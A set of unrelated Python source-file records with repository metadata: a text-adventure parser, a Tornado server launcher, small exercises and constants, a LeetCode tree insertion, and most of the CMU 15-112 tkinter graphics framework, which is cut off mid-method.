f5294106afea4b3866b4b8dcb792f1059fa780fe | b8ee1c31d716d8436ffce4f70107aecdf88f34ab | /parse.py | 979314dca394e2c3021121dfdfe948764de71c0b | [] | no_license | ExistNot/cs1113 | 1442c73251009a102f80cb529e77fcb6dd6ddcc0 | 28d17c10e7e05de65f0ca81bdf262adb1988b553 | refs/heads/master | 2021-04-28T18:53:31.044180 | 2018-02-13T01:16:35 | 2018-02-13T01:16:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,237 | py | import string # Used to strip user inputs of punctuation.
single_commands = {'go': {'north': ['north', 'n'], 'south': ['south', 's'], 'east': ['east', 'e'], 'west': ['west', 'w']}, 'check': {'inventory': ['inventory', 'i']}}
game_commands = ['help', 'exit', 'quit', 'look']
verbs = {'go': ['go', 'go to', 'walk', 'head', 'move'], \
'take': ['take', 'pick up', 'grab', 'get'], \
'give': ['give', 'hand'], \
'drop': ['drop', 'put down', 'throw away'], \
'open': ['open'], \
'close': ['close', 'shut', 'slam'], \
'equip': ['equip', 'put on', 'wear'], \
'unequip': ['unequip', 'take off', 'remove'], \
'use': ['use', 'apply'], \
'check': ['check', 'look', 'examine', 'inspect'], \
'attack': ['attack', 'fight', 'kill']}
prepositions = ["with", "to", "on", "from", "at"]
articles = ["a", "an", "the"]
def identify_verbs(text):
found_verb = False
if(len(text) > 0):
for character in string.punctuation:
text = text.replace(character, " ") # Strip away all punctuation.
for verb in verbs.keys(): # This loop replaces any synonym that appears at the beginning of the user's input with their generic verb equivalent.
for synonym in verbs[verb]: # e.g. "look at door" becomes "check door".
if text.startswith(synonym):
text = text[len(synonym):] # Strip the synonym from the beginning of the user's input.
text = verb + text # Put the generic verb equivalent at the beginning of the string.
found_verb = True # Let the code later on know that we found a matching verb.
return [found_verb, text]
def strip_articles(text):
if(len(text) > 0):
text = text.split(" ") # Split the text up into a list of words.
for index in range(len(text)):
for article in articles:
if(text[index] == article):
text[index] = "" # Empty out any articles (e.g. "a" or "the").
text = list(filter(None, text)) # Get rid of any empty strings in the input text.
text = " ".join(text) # This is essentially the oppostite of the split(" ") method - it puts the sentence back together.
return text
def parse_command(text, found_verb = True):
if(len(text) > 0):
text = text.split(" ") # Split the text up into a list of words.
if(len(text) == 1): # Stop here if we have a special in-game command such as "help" or "quit".
for command in game_commands:
if(text[0] == command):
return text
for verb in single_commands.keys(): # This set of loops replaces any listed single word command synonyms with their generic command equivalent and adds their implied verb.
for command in single_commands[verb].keys(): # e.g. ["i"] becomes ["check", "inventory"]
for synonym in single_commands[verb][command]:
if text[0] == synonym:
text.insert(0, verb)
text[1] = command
return text
if(found_verb):
return text
else:
return None # Return empty-handed if no matching commands were found.
elif(len(text) == 2):
if not found_verb:
text[0] = None # Get rid of the verb if we do not recognize it.
return text # Return what's left of the user's input. If a verb was found, this will return input in the form [VERB, NOUN].
# If no verb was found, this will return [None, NOUN]
elif(len(text) > 2):
if not found_verb:
text[0] = None
for preposition in prepositions:
if (text[1] == preposition):
return [text[0], None] # Commands with a preposition following a verb are invalid.
index = 2
while(index < len(text)):
found_preposition = False
for preposition in prepositions:
if (text[index] == preposition):
found_preposition = True
if(found_preposition):
text.pop(index)
index += 1
else:
text[index - 1] += " " + text[index]
text.pop(index)
return text
else: # Return empty handed if there is no user input.
return None
def get_command():
text = input('>> ').lower()
[found_verb, user_input] = identify_verbs(text)
user_input = strip_articles(user_input)
user_input = parse_command(user_input, found_verb)
return [text, user_input] | [
"stevenfoland@tsogiants.org"
] | stevenfoland@tsogiants.org |
82943776287d418612f095bed943ef0de30beea2 | 871648ff8167029d6fab6f41ccdb4cb025b9f90b | /src/main.py | c91ee13f12be6c2cde7571359e798e8abadf8d60 | [] | no_license | zn-chen/dockerlab | 33f1f72db7b242eea3719920f02deb52d1245f55 | d64996969c9deda02ed6e2089b2e30f8318b7aaf | refs/heads/master | 2023-03-07T08:37:29.963901 | 2019-09-19T11:10:01 | 2019-09-19T11:10:01 | 209,507,478 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,295 | py | # -*- coding: utf-8 -*-
import sys
import os
import time
from signal import signal, SIGINT, SIGTERM
from tornado.ioloop import IOLoop
from tornado.web import Application
from tornado.options import options, define
from tornado.netutil import bind_sockets
from tornado.httpserver import HTTPServer
from tornado.log import gen_log
from router import ROUTER
from conf import Config
import scheduled
LOGO = """
╔╦╗┌─┐┌─┐┬┌─┌─┐┬─┐╦ ┌─┐┌┐
║║│ ││ ├┴┐├┤ ├┬┘║ ├─┤├┴┐
═╩╝└─┘└─┘┴ ┴└─┘┴└─╩═╝┴ ┴└─┘"""
class Entry(object):
"""
程序入口类
"""
def __init__(self):
"""
构造器
"""
self._config = Config
self._options = options
self._ioloop = IOLoop.current()
self._sockets = bind_sockets(self._config.base_port)
self._init_options()
# exit signal
signal(SIGINT, lambda sig, frame: self._ioloop.add_callback_from_signal(self.stop))
signal(SIGTERM, lambda sig, frame: self._ioloop.add_callback_from_signal(self.stop))
self._server = HTTPServer(Application(**self._settings))
def _init_options(self):
"""
初始化配置
:return:
"""
# make application setting
self._settings = {
r'handlers': ROUTER,
}
# init log
self._options.logging = self._config.log_level
# log to file
if self._config.log_to_file:
self._options.log_rotate_mode = self._config.log_rotate_mode
# 时间分割
if self._config.log_rotate_mode == "time":
self._options.log_rotate_when = self._config.log_rotate_when
self._options.log_rotate_interval = self._config.log_rotate_interval
# 文件大小分割
elif self._config.log_rotate_mode == "size":
self._options.log_max_size = self._config.log_file_max_size
else:
# TODO 日志初始化失败通知
pass
self._options.log_file_num_backups = self._config.log_file_num_backups
options.log_file_prefix = r'{0:s}/runtime-{1:s}.pid-{2:s}.log'.format(
self._config.log_file_path,
time.strftime("%Y-%m-%d", time.localtime()),
str(os.getpid()),
)
# log to stderr
self._options.log_to_stderr = self._config.log_to_stderr
# start log
self._options.parse_command_line()
gen_log.info("configuration initialization")
def start(self):
"""
启动tornado
:return:
"""
gen_log.info(LOGO)
self._server.add_sockets(self._sockets)
gen_log.info("tornado service start")
scheduled.start()
gen_log.info("scheduled task start")
self._ioloop.start()
def stop(self, code=0, frame=None):
"""
停止tornado服务
:return:
"""
self._server.stop()
gen_log.info("http service stop")
self._ioloop.stop()
gen_log.info("tornado service exit")
sys.exit(0)
if __name__ == r'__main__':
Entry().start()
| [
"2972789494@qq.com"
] | 2972789494@qq.com |
6c917765f0811b156ddda90eac4c87e9f06185f7 | f98c9dea0e212be5c7bc3161499e5633383bd4d7 | /python/fruit_package_module_test.py | c82839cdcdd29c508d4f8791380d7717c7237b7c | [
"MIT"
] | permissive | ysoftman/test_code | dddb5bee3420977bfa335320a09d66e5984403f5 | 0bf6307073081eeb1d654a1eb5efde44a0bdfe1e | refs/heads/master | 2023-08-17T05:45:49.716829 | 2023-08-16T05:00:09 | 2023-08-16T05:00:09 | 108,200,568 | 4 | 0 | MIT | 2023-03-15T04:23:10 | 2017-10-25T00:49:26 | C++ | UTF-8 | Python | false | false | 509 | py | # 패키지(모듈이 모인 디렉토리)가 이닌 모듈이 같은 경로에 있는 경우
# import fruite_module as fm
# alias 로 패키지.모듈 사용하기
import fruite_package.fruit_module as fm
fm.fruit.apple(100)
fm.fruit.lemon("2000")
# 패키지.모듈 전체 사용하기
from fruite_package.fruit_module import *
fruit.apple(100)
# 패키지.모듈 중 fruit 클래스를 fr 이름으로 사용
from fruite_package.fruit_module import fruit as fr
fr.lemon(200)
fr.apple(50)
fr.orange(100)
| [
"ysoftman@gmail.com"
] | ysoftman@gmail.com |
22cff3945dd868a9c060382d1020722c7a4d2eea | 4a08ae605a8f96146b14881330d21317a67e225d | /data_types/question17.py | a245b912a288e46b12cce2f9783bf7dbe0c76b56 | [] | no_license | alex1the1great/Assignment | dd6083a2196d9bae36bb66bf12a2bdc07a0b93e8 | 5a806668c3bfc0d9750421c4ae287f19cbf36fc7 | refs/heads/master | 2022-11-13T11:07:13.875607 | 2020-06-29T03:51:17 | 2020-06-29T03:51:17 | 275,724,898 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 361 | py | import re
print('Example: 1 2 3 4 5')
numbers = input('Enter list of numbers separate with space:')
pattern = r'^[0-9\s]+$'
check_multi = re.findall(pattern, numbers)
if not check_multi:
print('Please enter valid format')
else:
total = numbers.split(' ')
product = 1
for i in total:
i = int(i)
product *= i
print(product)
| [
"asimshrestha608@gmail.com"
] | asimshrestha608@gmail.com |
61c9adc27d3ef6c82ea3776400b18ef2ca1d64d9 | 4680d397b8226145d6c13a42b4dee9946576f0c3 | /cop_exe/consts.py | fe50bb941ef37d86bdf825775db43a56b8ef5813 | [
"MIT"
] | permissive | Gaming32/COP.EXE | c91e8f8d5a6b82a948ce76b9fd43ff910a381a85 | 52fb496174bd0a334c0509cc03fdf926c8551565 | refs/heads/main | 2023-04-22T02:49:13.897139 | 2021-04-04T23:23:58 | 2021-04-04T23:23:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 285 | py | Color = tuple[int, int, int]
ColorTransp = tuple[int, int, int, int]
FRAMERATE: float = 75
WINDOW_SIZE: tuple[int, int] = (1280, 720)
CLEAR_COLOR: Color = (64, 64, 64)
PLAYER_COLOR: Color = (0, 255, 0)
ENEMY_COLOR: Color = (255, 0, 0)
CHARACTER_OPACITY: int = 96
BLINK_TIME = 0.75
| [
"soujournme@gmail.com"
] | soujournme@gmail.com |
97103fe9f296505d004259772c99bf85a9614fb2 | d4c870aaea2eb0d2299bfc24e2a2cf57203c1796 | /0701.insert-into-a-binary-search-tree/insert-into-a-binary-search-tree.py | 571c42ef15af239c4bbc60e066218566313f95f0 | [] | no_license | koten0224/Leetcode | 99a8ab369ffdc40b8e23b32b3fb95e248483f87f | 304fa8289d8f8b2084ee62662b0fcfd3b1cb929a | refs/heads/master | 2020-06-02T23:06:17.367723 | 2019-11-17T15:50:09 | 2019-11-17T15:50:09 | 191,337,592 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def insertIntoBST(self, root: TreeNode, val: int) -> TreeNode:
if(root == None): return TreeNode(val);
if(root.val < val): root.right = self.insertIntoBST(root.right, val);
else: root.left = self.insertIntoBST(root.left, val);
return(root) | [
"koten0224@gmail.com"
] | koten0224@gmail.com |
119135e1d0bacf9933f1f45fe9d6140728236592 | 16279dd5c697aae3bacca8f4c894460ccbcaee00 | /TP3/cmu_112_graphics.py | 68b7c8b814c5493a9cc788e390e6a0afcb78dfc5 | [] | no_license | zymason/15112-TP | 4c5fab7adeb59bd6d096e0ddeca743898d750669 | 05f19f185edf0525ecee5f18db9d6a8bef80bcce | refs/heads/master | 2023-04-18T18:43:32.538537 | 2021-05-05T04:38:37 | 2021-05-05T04:38:37 | 357,681,470 | 1 | 0 | null | 2021-05-05T04:26:02 | 2021-04-13T20:33:44 | Python | UTF-8 | Python | false | false | 33,898 | py | # cmu_112_graphics.py
# version 0.9.0
# Pre-release for CMU 15-112-s21
# Require Python 3.6 or later
import sys
if ((sys.version_info[0] != 3) or (sys.version_info[1] < 6)):
raise Exception('cmu_112_graphics.py requires Python version 3.6 or later.')
# Track version and file update timestamp
import datetime
MAJOR_VERSION = 0
MINOR_VERSION = 9.0 # version 0.9.0
LAST_UPDATED = datetime.date(year=2021, month=4, day=12)
# Pending changes:
# * Fix Windows-only bug: Position popup dialog box over app window (already works fine on Macs)
# * Add documentation
# * integrate sounds (probably from pyGame)
# * Improved methodIsOverridden to Ultimate_TTT and ModalApp
# * Save to animated gif and/or mp4 (with audio capture?)
# Deferred changes:
# * replace/augment tkinter canvas with PIL/Pillow imageDraw (perhaps with our own fn names)
# Changes in v0.9.0
# * added simpler top-level modes implementation that does not include mode objects
# * added ImageDraw and ImageFont to PIL imports
# Changes in v0.8.8
# * added __repr__ methods so:
# * print(event) works and prints event.key or event.x + event.y
# * print(app) works and prints just the user defined app fields
# Changes in v0.8.7
# * removed modes (for now)
# Changes in v0.8.6
# * s21
# Changes in v0.8.5
# * Support loadImage from Modes
# Changes in v0.8.3 + v0.8.4
# * Use default empty Mode if none is provided
# * Add KeyRelease event binding
# * Drop user32.SetProcessDPIAware (caused window to be really tiny on some Windows machines)
# Changes in v0.8.1 + v0.8.2
# * print version number and last-updated date on load
# * restrict modifiers to just control key (was confusing with NumLock, etc)
# * replace hasModifiers with 'control-' prefix, as in 'control-A'
# * replace app._paused with app.paused, etc (use app._ for private variables)
# * use improved ImageGrabber import for linux
# Changes in v0.8.0
# * suppress more modifier keys (Super_L, Super_R, ...)
# * raise exception on event.keysym or event.char + works with key = 'Enter'
# * remove tryToInstall
# Changes in v0.7.4
# * renamed drawAll back to redrawAll :-)
# Changes in v0.7.3
# * Ignore mousepress-drag-release and defer configure events for drags in titlebar
# * Extend deferredRedrawAll to 100ms with replace=True and do not draw while deferred
# (together these hopefully fix Windows-only bug: file dialog makes window not moveable)
# * changed sizeChanged to not take event (use app.width and app.height)
# Changes in v0.7.2
# * Singleton App._theRoot instance (hopefully fixes all those pesky Tkinter errors-on-exit)
# * Use user32.SetProcessDPIAware to get resolution of screen grabs right on Windows-only (fine on Macs)
# * Replaces showGraphics() with runApp(...), which is a veneer for App(...) [more intuitive for pre-OOP part of course]
# * Fixes/updates images:
# * disallows loading images in redrawAll (raises exception)
# * eliminates cache from loadImage
# * eliminates app.getTkinterImage, so user now directly calls ImageTk.PhotoImage(image))
# * also create_image allows magic pilImage=image instead of image=ImageTk.PhotoImage(app.image)
# Changes in v0.7.1
# * Added keyboard shortcut:
# * cmd/ctrl/alt-x: hard exit (uses os._exit() to exit shell without tkinter error messages)
# * Fixed bug: shortcut keys stopped working after an MVC violation (or other exception)
# * In app.saveSnapshot(), add .png to path if missing
# * Added: Print scripts to copy-paste into shell to install missing modules (more automated approaches proved too brittle)
# Changes in v0.7
# * Added some image handling (requires PIL (retained) and pyscreenshot (later removed):
# * app.loadImage() # loads PIL/Pillow image from file, with file dialog, or from URL (http or https)
# * app.scaleImage() # scales a PIL/Pillow image
# * app.getTkinterImage() # converts PIL/Pillow image to Tkinter PhotoImage for use in create_image(...)
# * app.getSnapshot() # get a snapshot of the canvas as a PIL/Pillow image
# * app.saveSnapshot() # get and save a snapshot
# * Added app._paused, app.togglePaused(), and paused highlighting (red outline around canvas when paused)
# * Added keyboard shortcuts:
# * cmd/ctrl/alt-s: save a snapshot
# * cmd/ctrl/alt-p: pause/unpause
# * cmd/ctrl/alt-q: quit
# Changes in v0.6:
# * Added fnPrefix option to Ultimate_TTT (so multiple Ultimate_TTT's can be in one file)
# * Added showGraphics(drawFn) (for graphics-only drawings before we introduce animations)
# Changes in v0.5:
# * Added:
# * app.winx and app.winy (and add winx,winy parameters to app.__init__, and sets these on configure events)
# * app.setSize(width, height)
# * app.setPosition(x, y)
# * app.quit()
# * app.showMessage(message)
# * app.getUserInput(prompt)
# * App.lastUpdated (instance of datetime.date)
# * Show popup dialog box on all exceptions (not just for MVC violations)
# * Draw (in canvas) "Exception! App Stopped! (See console for details)" for any exception
# * Replace callUserMethod() with more-general @_safeMethod decorator (also handles exceptions outside user methods)
# * Only include lines from user's code (and not our framework nor tkinter) in stack traces
# * Require Python version (3.6 or greater)
# Changes in v0.4:
# * Added __setattr__ to enforce Type 1A MVC Violations (setting app.x in redrawAll) with better stack trace
# * Added app._deferredRedrawAll() (avoids resizing drawing/crashing bug on some platforms)
# * Added deferredMethodCall() and app._afterIdMap to generalize afterId handling
# * Use (_ is None) instead of (_ == None)
# Changes in v0.3:
# * Fixed "event not defined" bug in sizeChanged handlers.
# * draw "MVC Violation" on Type 2 violation (calling draw methods outside redrawAll)
# Changes in v0.2:
# * Handles another MVC violation (now detects drawing on canvas outside of redrawAll)
# * App stops running when an exception occurs (in user code) (stops cascading errors)
# Changes in v0.1:
# * OOPy + supports inheritance + supports multiple apps in one file + etc
# * uses import instead of copy-paste-edit starter code + no "do not edit code below here!"
# * no longer uses Struct (which was non-Pythonic and a confusing way to sort-of use OOP)
# * Includes an early version of MVC violation handling (detects model changes in redrawAll)
# * added events:
# * appStarted (no init-vs-__init__ confusion)
# * appStopped (for cleanup)
# * keyReleased (well, sort of works) + mouseReleased
# * mouseMoved + mouseDragged
# * sizeChanged (when resizing window)
# * improved key names (just use event.key instead of event.char and/or event.keysym + use names for 'Enter', 'Escape', ...)
# * improved function names (renamed redrawAll to drawAll)
# * improved (if not perfect) exiting without that irksome Tkinter error/bug
# * app has a title in the titlebar (also shows window's dimensions)
# * supports Modes and ModalApp (see ModalApp and Mode, and also see TestModalApp example)
# * supports Ultimate_TTT (using top-level functions instead of subclasses and methods)
# * supports version checking with App.majorVersion, App.minorVersion, and App.version
# * logs drawing calls to support autograding views (still must write that autograder, but this is a very helpful first step)
from tkinter import *
from tkinter import messagebox, simpledialog, filedialog
import inspect, copy, traceback
import sys, os
from io import BytesIO
def failedImport(importName, installName=None):
installName = installName or importName
print('**********************************************************')
print(f'** Cannot import {importName} -- it seems you need to install {installName}')
print(f'** This may result in limited functionality or even a runtime error.')
print('**********************************************************')
print()
try: from PIL import Image, ImageTk, ImageDraw, ImageFont
except ModuleNotFoundError: failedImport('PIL', 'pillow')
if sys.platform.startswith('linux'):
try: import pyscreenshot as ImageGrabber
except ModuleNotFoundError: failedImport('pyscreenshot')
else:
try: from PIL import ImageGrab as ImageGrabber
except ModuleNotFoundError: pass # Our PIL warning is already printed above
try: import requests
except ModuleNotFoundError: failedImport('requests')
def getHash(obj):
# This is used to detect MVC violations in redrawAll
# @TODO: Make this more robust and efficient
try:
return getHash(obj.__dict__)
except:
if (isinstance(obj, list)): return getHash(tuple([getHash(v) for v in obj]))
elif (isinstance(obj, set)): return getHash(sorted(obj))
elif (isinstance(obj, dict)): return getHash(tuple([obj[key] for key in sorted(obj)]))
else:
try: return hash(obj)
except: return getHash(repr(obj))
class WrappedCanvas(Canvas):
# Enforces MVC: no drawing outside calls to redrawAll
# Logs draw calls (for autograder) in canvas.loggedDrawingCalls
def __init__(wrappedCanvas, app):
wrappedCanvas.loggedDrawingCalls = [ ]
wrappedCanvas.logDrawingCalls = True
wrappedCanvas.inRedrawAll = False
wrappedCanvas.app = app
super().__init__(app._root, width=app.width, height=app.height)
def log(self, methodName, args, kwargs):
if (not self.inRedrawAll):
self.app._mvcViolation('you may not use the canvas (the view) outside of redrawAll')
if (self.logDrawingCalls):
self.loggedDrawingCalls.append((methodName, args, kwargs))
def create_arc(self, *args, **kwargs): self.log('create_arc', args, kwargs); return super().create_arc(*args, **kwargs)
def create_bitmap(self, *args, **kwargs): self.log('create_bitmap', args, kwargs); return super().create_bitmap(*args, **kwargs)
def create_line(self, *args, **kwargs): self.log('create_line', args, kwargs); return super().create_line(*args, **kwargs)
def create_oval(self, *args, **kwargs): self.log('create_oval', args, kwargs); return super().create_oval(*args, **kwargs)
def create_polygon(self, *args, **kwargs): self.log('create_polygon', args, kwargs); return super().create_polygon(*args, **kwargs)
def create_rectangle(self, *args, **kwargs): self.log('create_rectangle', args, kwargs); return super().create_rectangle(*args, **kwargs)
def create_text(self, *args, **kwargs): self.log('create_text', args, kwargs); return super().create_text(*args, **kwargs)
def create_window(self, *args, **kwargs): self.log('create_window', args, kwargs); return super().create_window(*args, **kwargs)
def create_image(self, *args, **kwargs):
self.log('create_image', args, kwargs);
usesImage = 'image' in kwargs
usesPilImage = 'pilImage' in kwargs
if ((not usesImage) and (not usesPilImage)):
raise Exception('create_image requires an image to draw')
elif (usesImage and usesPilImage):
raise Exception('create_image cannot use both an image and a pilImage')
elif (usesPilImage):
pilImage = kwargs['pilImage']
del kwargs['pilImage']
if (not isinstance(pilImage, Image.Image)):
raise Exception('create_image: pilImage value is not an instance of a PIL/Pillow image')
image = ImageTk.PhotoImage(pilImage)
else:
image = kwargs['image']
if (isinstance(image, Image.Image)):
raise Exception('create_image: image must not be an instance of a PIL/Pillow image\n' +
'You perhaps meant to convert from PIL to Tkinter, like so:\n' +
' canvas.create_image(x, y, image=ImageTk.PhotoImage(image))')
kwargs['image'] = image
return super().create_image(*args, **kwargs)
class App(object):
majorVersion = MAJOR_VERSION
minorVersion = MINOR_VERSION
version = f'{majorVersion}.{minorVersion}'
lastUpdated = LAST_UPDATED
_theRoot = None # singleton Tkinter root object
####################################
# User Methods:
####################################
def redrawAll(app, canvas): pass # draw (view) the model in the canvas
def appStarted(app): pass # initialize the model (app.xyz)
def appStopped(app): pass # cleanup after app is done running
def keyPressed(app, event): pass # use event.key
def keyReleased(app, event): pass # use event.key
def mousePressed(app, event): pass # use event.x and event.y
def mouseReleased(app, event): pass # use event.x and event.y
def mouseMoved(app, event): pass # use event.x and event.y
def mouseDragged(app, event): pass # use event.x and event.y
def timerFired(app): pass # respond to timer events
def sizeChanged(app): pass # respond to window size changes
####################################
# Implementation:
####################################
def __init__(app, width=300, height=300, x=0, y=0, title=None, autorun=True, mvcCheck=True, logDrawingCalls=True):
app.winx, app.winy, app.width, app.height = x, y, width, height
app.timerDelay = 100 # milliseconds
app.mouseMovedDelay = 50 # ditto
app._title = title
app._mvcCheck = mvcCheck
app._logDrawingCalls = logDrawingCalls
app._running = app._paused = False
app._mousePressedOutsideWindow = False
if autorun: app.run()
def __repr__(app):
keys = set(app.__dict__.keys())
keyValues = [ ]
for key in sorted(keys - app._ignoredFields):
keyValues.append(f'{key}={app.__dict__[key]}')
return f'App({", ".join(keyValues)})'
def setSize(app, width, height):
app._root.geometry(f'{width}x{height}')
def setPosition(app, x, y):
app._root.geometry(f'+{x}+{y}')
def showMessage(app, message):
messagebox.showinfo('showMessage', message, parent=app._root)
def getUserInput(app, prompt):
return simpledialog.askstring('getUserInput', prompt)
def loadImage(app, path=None):
if (app._canvas.inRedrawAll):
raise Exception('Cannot call loadImage in redrawAll')
if (path is None):
path = filedialog.askopenfilename(initialdir=os.getcwd(), title='Select file: ',filetypes = (('Image files','*.png *.gif *.jpg'),('all files','*.*')))
if (not path): return None
if (path.startswith('http')):
response = requests.request('GET', path) # path is a URL!
image = Image.open(BytesIO(response.content))
else:
image = Image.open(path)
return image
def scaleImage(app, image, scale, antialias=False):
# antialiasing is higher-quality but slower
resample = Image.ANTIALIAS if antialias else Image.NEAREST
return image.resize((round(image.width*scale), round(image.height*scale)), resample=resample)
def getSnapshot(app):
app._showRootWindow()
x0 = app._root.winfo_rootx() + app._canvas.winfo_x()
y0 = app._root.winfo_rooty() + app._canvas.winfo_y()
result = ImageGrabber.grab((x0,y0,x0+app.width,y0+app.height))
return result
def saveSnapshot(app):
path = filedialog.asksaveasfilename(initialdir=os.getcwd(), title='Select file: ',filetypes = (('png files','*.png'),('all files','*.*')))
if (path):
# defer call to let filedialog close (and not grab those pixels)
if (not path.endswith('.png')): path += '.png'
app._deferredMethodCall(afterId='saveSnapshot', afterDelay=0, afterFn=lambda:app.getSnapshot().save(path))
def _togglePaused(app):
app._paused = not app._paused
def quit(app):
app._running = False
app._root.quit() # break out of root.mainloop() without closing window!
def __setattr__(app, attr, val):
d = app.__dict__
d[attr] = val
canvas = d.get('_canvas', None)
if (d.get('running', False) and
d.get('mvcCheck', False) and
(canvas is not None) and
canvas.inRedrawAll):
app._mvcViolation(f'you may not change app.{attr} in the model while in redrawAll (the view)')
def _printUserTraceback(app, exception, tb):
stack = traceback.extract_tb(tb)
lines = traceback.format_list(stack)
inRedrawAllWrapper = False
printLines = [ ]
for line in lines:
if (('"cmu_112_graphics.py"' not in line) and
('/cmu_112_graphics.py' not in line) and
('\\cmu_112_graphics.py' not in line) and
('/tkinter/' not in line) and
('\\tkinter\\' not in line)):
printLines.append(line)
if ('redrawAllWrapper' in line):
inRedrawAllWrapper = True
if (len(printLines) == 0):
# No user code in trace, so we have to use all the code (bummer),
# but not if we are in a redrawAllWrapper...
if inRedrawAllWrapper:
printLines = [' No traceback available. Error occurred in redrawAll.\n']
else:
printLines = lines
print('Traceback (most recent call last):')
for line in printLines: print(line, end='')
print(f'Exception: {exception}')
def _safeMethod(appMethod):
def m(*args, **kwargs):
app = args[0]
try:
return appMethod(*args, **kwargs)
except Exception as e:
app._running = False
app._printUserTraceback(e, sys.exc_info()[2])
if ('_canvas' in app.__dict__):
app._canvas.inRedrawAll = True # not really, but stops recursive MVC Violations!
app._canvas.create_rectangle(0, 0, app.width, app.height, fill=None, width=10, outline='red')
app._canvas.create_rectangle(10, app.height-50, app.width-10, app.height-10,
fill='white', outline='red', width=4)
app._canvas.create_text(app.width/2, app.height-40, text=f'Exception! App Stopped!', fill='red', font='Arial 12 bold')
app._canvas.create_text(app.width/2, app.height-20, text=f'See console for details', fill='red', font='Arial 12 bold')
app._canvas.update()
app.showMessage(f'Exception: {e}\nClick ok then see console for details.')
return m
def _methodIsOverridden(app, methodName):
return (getattr(type(app), methodName) is not getattr(App, methodName))
def _mvcViolation(app, errMsg):
app._running = False
raise Exception('MVC Violation: ' + errMsg)
@_safeMethod
def _redrawAllWrapper(app):
if (not app._running): return
if ('deferredRedrawAll' in app._afterIdMap): return # wait for pending call
app._canvas.inRedrawAll = True
app._canvas.delete(ALL)
width,outline = (10,'red') if app._paused else (0,'white')
app._canvas.create_rectangle(0, 0, app.width, app.height, fill='white', width=width, outline=outline)
app._canvas.loggedDrawingCalls = [ ]
app._canvas.logDrawingCalls = app._logDrawingCalls
hash1 = getHash(app) if app._mvcCheck else None
try:
app.redrawAll(app._canvas)
hash2 = getHash(app) if app._mvcCheck else None
if (hash1 != hash2):
app._mvcViolation('you may not change the app state (the model) in redrawAll (the view)')
finally:
app._canvas.inRedrawAll = False
app._canvas.update()
def _deferredMethodCall(app, afterId, afterDelay, afterFn, replace=False):
def afterFnWrapper():
app._afterIdMap.pop(afterId, None)
afterFn()
id = app._afterIdMap.get(afterId, None)
if ((id is None) or replace):
if id: app._root.after_cancel(id)
app._afterIdMap[afterId] = app._root.after(afterDelay, afterFnWrapper)
def _deferredRedrawAll(app):
app._deferredMethodCall(afterId='deferredRedrawAll', afterDelay=100, afterFn=app._redrawAllWrapper, replace=True)
@_safeMethod
def _appStartedWrapper(app):
app.appStarted()
app._redrawAllWrapper()
_keyNameMap = { '\t':'Tab', '\n':'Enter', '\r':'Enter', '\b':'Backspace',
chr(127):'Delete', chr(27):'Escape', ' ':'Space' }
@staticmethod
def _useEventKey(attr):
raise Exception(f'Use event.key instead of event.{attr}')
@staticmethod
def _getEventKeyInfo(event, keysym, char):
key = c = char
hasControlKey = (event.state & 0x4 != 0)
if ((c in [None, '']) or (len(c) > 1) or (ord(c) > 255)):
key = keysym
if (key.endswith('_L') or
key.endswith('_R') or
key.endswith('_Lock')):
key = 'Modifier_Key'
elif (c in App._keyNameMap):
key = App._keyNameMap[c]
elif ((len(c) == 1) and (1 <= ord(c) <= 26)):
key = chr(ord('a')-1 + ord(c))
hasControlKey = True
if hasControlKey and (len(key) == 1):
# don't add control- prefix to Enter, Tab, Escape, ...
key = 'control-' + key
return key
class EventWrapper(Event):
def __init__(self, event):
for key in event.__dict__:
if (not key.startswith('__')):
self.__dict__[key] = event.__dict__[key]
class MouseEventWrapper(EventWrapper):
def __repr__(self):
return f'Event(x={self.x}, y={self.y})'
class KeyEventWrapper(EventWrapper):
def __init__(self, event):
keysym, char = event.keysym, event.char
del event.keysym
del event.char
super().__init__(event)
self.key = App._getEventKeyInfo(event, keysym, char)
def __repr__(self):
return f'Event(key={repr(self.key)})'
keysym = property(lambda *args: App._useEventKey('keysym'),
lambda *args: App._useEventKey('keysym'))
char = property(lambda *args: App._useEventKey('char'),
lambda *args: App._useEventKey('char'))
@_safeMethod
def _keyPressedWrapper(app, event):
event = App.KeyEventWrapper(event)
if (event.key == 'control-s'):
app.saveSnapshot()
elif (event.key == 'control-p'):
app._togglePaused()
app._redrawAllWrapper()
elif (event.key == 'control-q'):
app.quit()
elif (event.key == 'control-x'):
os._exit(0) # hard exit avoids tkinter error messages
elif (app._running and
(not app._paused) and
app._methodIsOverridden('keyPressed') and
(not event.key == 'Modifier_Key')):
app.keyPressed(event)
app._redrawAllWrapper()
@_safeMethod
def _keyReleasedWrapper(app, event):
if (not app._running) or app._paused or (not app._methodIsOverridden('keyReleased')): return
event = App.KeyEventWrapper(event)
if (not event.key == 'Modifier_Key'):
app.keyReleased(event)
app._redrawAllWrapper()
@_safeMethod
def _mousePressedWrapper(app, event):
if (not app._running) or app._paused: return
if ((event.x < 0) or (event.x > app.width) or
(event.y < 0) or (event.y > app.height)):
app._mousePressedOutsideWindow = True
else:
app._mousePressedOutsideWindow = False
app._mouseIsPressed = True
app._lastMousePosn = (event.x, event.y)
if (app._methodIsOverridden('mousePressed')):
event = App.MouseEventWrapper(event)
app.mousePressed(event)
app._redrawAllWrapper()
@_safeMethod
def _mouseReleasedWrapper(app, event):
if (not app._running) or app._paused: return
app._mouseIsPressed = False
if app._mousePressedOutsideWindow:
app._mousePressedOutsideWindow = False
app._sizeChangedWrapper()
else:
app._lastMousePosn = (event.x, event.y)
if (app._methodIsOverridden('mouseReleased')):
event = App.MouseEventWrapper(event)
app.mouseReleased(event)
app._redrawAllWrapper()
@_safeMethod
def _timerFiredWrapper(app):
if (not app._running) or (not app._methodIsOverridden('timerFired')): return
if (not app._paused):
app.timerFired()
app._redrawAllWrapper()
app._deferredMethodCall(afterId='_timerFiredWrapper', afterDelay=app.timerDelay, afterFn=app._timerFiredWrapper)
@_safeMethod
def _sizeChangedWrapper(app, event=None):
if (not app._running): return
if (event and ((event.width < 2) or (event.height < 2))): return
if (app._mousePressedOutsideWindow): return
app.width,app.height,app.winx,app.winy = [int(v) for v in app._root.winfo_geometry().replace('x','+').split('+')]
if (app._lastWindowDims is None):
app._lastWindowDims = (app.width, app.height, app.winx, app.winy)
